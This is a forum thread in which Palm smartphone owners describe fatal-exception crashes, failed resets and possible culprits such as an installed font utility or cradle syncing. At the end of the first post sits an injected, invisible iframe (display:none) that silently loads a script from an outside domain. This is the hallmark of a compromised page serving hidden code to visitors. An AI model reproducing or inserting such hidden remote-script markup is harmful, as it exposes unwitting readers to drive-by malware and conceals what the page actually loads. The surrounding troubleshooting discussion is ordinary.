+ Reply to Thread
    tcv

My first baaaaad crash

Today, after playing with Xiino. I remained connected to 1xRTT and popped the 7135 into the cradle.

I noticed that the LED remained on and green for awhile. I picked it up to see if I was somehow connected still and noticed a Fatal Exception. Yuck.

Dutifully, I clicked the Reset button. The logo came up, but fatal excepted again.

I tried a soft reset. Same thing.

I had to hard reset.

I had a CLIE some time ago. (I forget the model.) It would periodically fatal except. I wasn't sure why, never did figure it out. I sure hope this model isn't going to turn out like that one. It was very difficult to be out the house and have it die on me like that. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Same senario here... BUT I can't get a hard reset to bring it back... just sticks on Palm Powered logo screen. :anger Two days old!!

Sending it back wasn't as bad as turning the ESN to the 6035.... which now seems like a brick!

I've seen other posts with similar problems...

tcv
    For now, I am going on the assumption that it's something I've installed. The biggest possible culprit is Font Bucket which is, somehow, changing the font of the LCD screen.

I'll figure it out.

m

One common denominator I've noticed in a number the various posts on crashes is the sync/cradle.

My phone was finishing a sync when I saw the Fatal exception/reset message. I pulled it out of the cradle and hit reset... I'm wondering if it would have changed things if I left it in and did the reset?